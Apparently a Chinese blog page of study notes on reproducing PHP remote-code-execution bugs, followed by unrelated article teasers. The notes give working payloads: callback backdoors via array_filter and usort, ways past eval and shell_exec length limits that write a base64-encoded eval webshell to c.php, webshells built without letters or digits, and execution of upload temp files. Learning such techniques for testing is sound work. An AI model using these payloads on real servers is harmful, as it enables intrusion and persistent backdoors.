当前位置：首页 > news >正文

RCE漏洞复现

news 2025/12/16 21:29:39

PHP命令执行常用函数

回调函数必须是命令执行和代码执行的函数，有两个条件

必须是函数，而且需要有函数运行的参数

危害：可以直接删除文件，添加文件，甚至可以添加用户

system  --执行外部程序，并且显示输出 
exec --执行一个外部程序   输出的是数组  要echo
passthru-- 执行外部程序并且显示原始输出  类似system 直接输出
shell_exec-- 要有echo输出才行
proc_open --打开进程文件指针  
popen --- 从管道执行命令

代码执行，只能执行php代码不能执行命令

eval  
assert
call_user_func 
call_user_func_arrayassert(eval($_post[123]));
call_user_func('assert',$_REQUEST['pass']);  //加了eval  蚁剑可以连接

rce的基础 php的回调后门

array_fillter 回调函数

$e = $_REQUEST['e'];
$arr array($_POST['pass'],);
array_filter($arr, base64_decode($e));

绕过安全狗

get_meta_tags 引入参数

eval();传入的参数需要引号

EVAL长度限制突破技巧

linux下反引号是可以执行命令的

<?php
$param = $_REQUEST['param']; //全局数组，接收GET，POST,COOKIE数据
If (
strlen($param) < 17 &&  
stripos($param, 'eval') === false &&  // 检查$param 是否含‘eval’ 不含就返回falase   和后面的false相等   就是true
stripos($param, 'assert') === false  //同上
) {
eval($param);  //当上面的都为真时，才执行  。
}
//虽然代码检查了 eval 和 assert 字符串，依然有可能存在其他恶意代码或利用漏洞的方式

所以可以用

`$_GET[1]`  去用命令执行 去绕过  反引号在Linux下是可以执行命令的`$_GET[1]`;&1=任何的恶意代码
最后需要用 echo 打印出来   因为eval执行不显示页面

也可用

foo.php?1=file_put_contents&param=$_GET[1](N,P,8); //底层c语言写的8
foo.php?1=file_put_contents&param=$_GET[1](N,w,8);
/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' ✲写入文件'N'中   */

foo.php?param=include$_GET[1];&1=php://filter/read=convert.b  ase64-decode/resource=N
为什么这里要转成base64呢，不直接追加呢，因为file_put_contents 是追加不了特殊字符的< ?
然后用php伪协议 把这base64转成正常的一句话了，然后用文件包含直接执行了
include 视为一切文件为php执行文件 
解码出来为<?php eval($POST[9])

也可以用

usort(...$_GET);
foo.php?1[]=test&1[]=phpinfo();&2=assert
PHP5.6+变长参数 ⇒ usort回调后门 ⇒ 任意代码执行
...在php中表示为变长参数,js也是
抓包burpsuite
所有回调函数都是把接受到的参数，放在回调函数去执行

8个字符长短，更符合Linux下的环境

Linux命令长度限制突破方法

<?php
$param = $_REQUEST['param'];  
if ( strlen($param) < 8 ) 
{  echo shell_exec($param); //可以直接执行Linux命令 
}

$ ls -t
ech\ o \    PD9\ waH\ AgZ\ XZh\ bCg\ kX0\ dFV\ Fsx\ XSk\  7|\
bas\ e64\   -\  d>\ c.p\ hp
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>  c.php
ls -t>0 以时间先后顺序创建文件  0里面的内容就是base64编码  然后
sh 0

把一句话木马base64之后的编码一点点写成文件形式，以时间的形式排序，最后执行这一串编码

echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>  c.php
ls -t | xxd 以十六进制查看文件

php一句话木马中，一定是要以base64编码写入的

还有种思路：就是在post中生成临时文件，匹配到临时文件，然后执行临时文件的代码

  .  /t*/*  //因为shell_exec本身就能执行Linux的命令，所以在param传参的时候不用加反引号执行了

无字母数字webshell之命令执行

<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");//取反绕过正则}eval($code);
}else{highlight_file(__FILE__);
}

取反用符号~

但是这种语法只能php7

文件上传就往web.php上面去传，不管它接不接，我只要这个临时文件

难点：如果没有接，php就会把临时文件删掉。但是不知道临时文件名

先定义一个文件上传，然后上传文件，然后去/tmp下看有没有生成临时文件，然后执行文件

里面的upload 需要改一下

前提要能执行临时文件，但是匹配不到临时文件，需要解决这个问题

GET和post同步执行。临时文件有一个特别的点，就是php临时文件生成是有规律的，最后一个字母，一次是大写一次是小写。

Linux通配符 glob 通配符

可以用'?' '*' '[' '[]'

eval 首先要先闭合?>php 后面才可以写 。用@匹配最后一个字母大写

eval 只是代码执行，但并不能执行Linux代码，所以少了一个Linux执行命令的东西，那就是反引号，那加上反引号就行了吗？很明显不行，要遵循urlcode编码，不能有空格需要把空格改成加号把空格换成%20 也可以

其实在burpsuite下面不用编码也可以直接传，但是从url传的话就必须转码

这三部分需要粘贴到抓的web.php的包中因为这是post传参

无参数读文件和RCE总结

这个就需要函数嵌套函数去执行，时间函数去拿.

也可以用array_rand 和array_flip 拿文件

用next(getallheaders())绕过这个限制，但是这个函数只能apache2里面使用

RCE漏洞复现

PHP命令执行常用函数回调函数必须是命令执行和代码执行的函数，有两个条件必须是函数，而且需要有函数运行的参数危害：可以直接删除文件，添加文件，甚至可以添加用户 system --执行外部程序，并且显示输…...

编程日记 2024/8/15 2:52:41

QTabWidget 用来分页显示重要函数: 1.void setTabText(int, QString); //设置页面的名字. 2.void setTabToolTip(QString); //设置页面的提示信息. 3.void setTabEnabled(bool); //设置页面是否被激活. 4.void setTabPosition(QTabPosition::South); //设置页面名字的位置. 5.…...

编程日记 2024/8/15 2:50:39

【RISC-V设计-14】- RISC-V处理器设计K0A之打印输出

【RISC-V设计-14】- RISC-V处理器设计K0A之打印输出文章目录【RISC-V设计-14】- RISC-V处理器设计K0A之打印输出1.简介2.验证用例3.软件代码4.链接脚本5.编译脚本6.仿真结果6.1 复位结束6.2 运行成功6.3 终端打印 7.总结 1.简介本文将详细阐述如何利用 printf 来打印字符串…...

编程日记 2024/8/15 2:45:35

时序预测|基于变分模态分解-时域卷积-双向长短期记忆-注意力机制多变量时间序列预测VMD-TCN-BiLSTM-Attention

时序预测|基于变分模态分解-时域卷积-双向长短期记忆-注意力机制多变量时间序列预测VMD-TCN-BiLSTM-Attention 文章目录前言时序预测|基于变分模态分解-时域卷积-双向长短期记忆-注意力机制多变量时间序列预测VMD-TCN-BiLSTM-Attention 一、VMD-TCN-BiLSTM-Attention模型1. **…...

编程日记 2024/8/15 2:43:31

Python知识点：如何使用Godot与Python进行游戏脚本编写

在Godot中使用Python进行游戏脚本编写，你需要通过一个插件来实现，因为Godot原生支持的脚本语言是GDScript、VisualScript和C#。这个插件被称为Godot-Python，它允许你在Godot引擎中使用Python编写脚本。以下是详细的步骤指导你如何配置和使用G…...

编程日记 2024/8/15 2:42:30

Spring MVC数据绑定和响应学习笔记

学习视频:12001 数据绑定_哔哩哔哩_bilibili 目录 1.数据绑定简单数据绑定默认类型数据绑定简单数据类型绑定的概念参数别名的设置 PathVariable注解的两个常用属性 POJO绑定自定义类型转换器 xml方式注解方式数组绑定集合绑定复杂POJO绑定属性为对象类…...

编程日记 2024/8/15 2:41:29

Vulnhub JIS-CTF靶机详解

项目地址 https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 修改靶机的网卡开机时长按shift，进入此页面选择root模式进入将只读模式改为读写模式 mount -o remount,rw / 查看本机的网卡名称 …...

编程日记 2024/8/15 2:40:28

FPGA资源评估

FPGA资源评估文章目录 FPGA资源评估前言一、资源评估1.1 资源有哪些1.2 资源统计二、 FPGA 的基本结构三、更为复杂的 FPGA 架构前言一、资源评估大家在项目中一般会要遇到需要资源评估的情况，例如立了新项目，前期需要确定使用什么FPGA片子&…...

编程日记 2024/8/15 2:38:27

REST framework中Views API学习

REST framework提供了一个APIView类，它是Django的View类的子类。 APIView类和一般的View类有以下不同： 被传入到处理方法的请求不会是Django的HttpRequest类的实例，而是REST framework的Request类的实例。处理方法可以返回REST framework的…...

编程日记 2024/8/15 2:36:24

Vue（四）——总结

渐进式JavaScript框架 Vue.js是一套构建用户界面（UI）的渐进式JavaScript框架。 1、库和框架的区别？ 库：库是提供给开发者的一个封装好的特定于某一方面的集合（方法和函数），库没有控制权&…...

编程日记 2024/8/15 2:34:22

计算机毕业设计招生宣传管理系统 Java+SpringBoot+Vue 前后端分离文档报告代码讲解安装调试

🍊作者：计算机编程-吉哥 🍊简介：专业从事JavaWeb程序开发，微信小程序开发，定制化项目、源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事，生活就是快乐的。 🍊心愿：点…...

编程日记 2024/8/15 2:33:21

练习题PHP5.6+变长参数 ⇒ usort回调后门 ⇒ 任意代码执行

突破长度限制使用usort上传后门 usort — 使用用户自定义的比较函数对数组中的值进行排序 paramusort(...$GET); ...为php设置可变长参数在url地址栏中输入[]test&1[]phpinfo();&2assert 包含了phpiinfo（）命令执行结合usort使用 assert…...

编程日记 2024/8/15 2:32:20

EPLAN关于PLC的输入输出模块绘制

EPLAN关于PLC的输入输出模块绘制总览图上的PLC绘制原理图上的PLC绘制编辑IO注释显示总览界面IO注释自动关联总览IO地址总览图上的PLC绘制右键项目【新建】页类型选择【总览】，描述可以自由编辑，之后确认即可。由于我们需要绘制PLC的输入输出&#x…...

编程日记 2024/8/15 2:30:18

【Linux】sersync 实时同步

原理 rsync 是不支持实时同步的，通常我们借助于 inotify 这个软件来实时监控文件变化，一旦inotify 监控到文件变化，则立即调用 rsync 进行同步，推送到 rsync 服务端。环境准备步骤1：获取数据包获取 sersync 的包…...

编程日记 2024/8/15 2:25:14

Unity 资源分享之恐龙Ceratosaurus资源模型携 82 个动画来袭

Unity 资源分享之恐龙Ceratosaurus资源模型携 82 个动画来袭一、前言二，资源包内容三、免费获取资源包一、前言亲爱的 Unity 开发者和爱好者们，大家好！今天要为大家分享一份超级酷炫的 Unity 资源——恐龙资源模型，而且它还…...

编程日记 2024/8/15 2:23:12

【AI绘画】学习内容简介

AI绘画-学习内容简介 1. 效果展示本次测试主要结果展示如下： 卡通手办定制1 卡通手办定制2 艺术写真定制 2. 主要目录 AI 绘画- 文生图，图生图及lora使用（基于diffusers） AI 绘画- 模型转换与快速生图（基于diffus…...

编程日记 2024/8/15 2:22:11

树形结构查找（B树、B+树）

平衡树结构的树高为 O(logn) ，平衡树结构包括两种平衡二叉树结构（分别为 AVL 树和 RBT）以及一种树结构（B-Tree，又称 B 树，它的度大于 2 ）。AVL 树和 RBT 适合内部存储的应用，而 B 树…...

编程日记 2024/8/15 2:21:09

网络通信（TCP/UDP协议三次握手四次挥手）

三、TCP协议与UDP协议 1、TCP/IP、TCP、 UDP是什么 TCP/IP协议是一个协议簇，里面包括很多协议的， UDP只是其中的一个， 之所以命名为TCP/IP协议， 因为TCP、 IP协议是两个很重要的协议，就用他两命名了，而TCP…...

编程日记 2024/8/15 2:20:08

C# ADO.Net 通用按月建表插入数据

原理是获取原表表结构以及索引动态拼接建表SQL，如果月表存在则不创建，不存在则创建表结构代码如下 /// <summary>/// 根据指定的表名和时间按月进行建表插入（如果不存在对应的月表）/// </summary>/// <param nam…...

编程日记 2024/8/15 2:19:07

19-ESP32-C3加大固件储存区

1默认编译情况。 2、改flash4M。ESP-IDF Partition Table Editor修改。 3、设置输入Partition Table 改自定义.CSV。保存。 4、查看命令输入Partition Table Editor打开-分区表编辑器UI。按图片增加。 nvs,data,nvs,0x9000,0x6000,, phy_init,data,phy,0xF000,0x1000,, factory…...

编程日记 2024/8/15 2:17:05

SciencePlots——绘制论文中的图片

文章目录安装一、风格二、1 资源安装 # 安装最新版 pip install githttps://github.com/garrettj403/SciencePlots.git# 安装稳定版 pip install SciencePlots一、风格简单好用的深度学习论文绘图专用工具包–Science Plot 二、 1 资源论文绘图神器来了：一行…...

编程新知 2025/9/8 13:50:07

ssc377d修改flash分区大小

1、flash的分区默认分配16M、 / # df -h Filesystem Size Used Available Use% Mounted on /dev/root 1.9M 1.9M 0 100% / /dev/mtdblock4 3.0M...

编程新知 2025/8/4 2:45:15

STM32+rt-thread判断是否联网

一、根据NETDEV_FLAG_INTERNET_UP位判断 static bool is_conncected(void) {struct netdev *dev RT_NULL;dev netdev_get_first_by_flags(NETDEV_FLAG_INTERNET_UP);if (dev RT_NULL){printf("wait netdev internet up...");return false;}else{printf("loc…...

编程新知 2025/9/23 20:06:08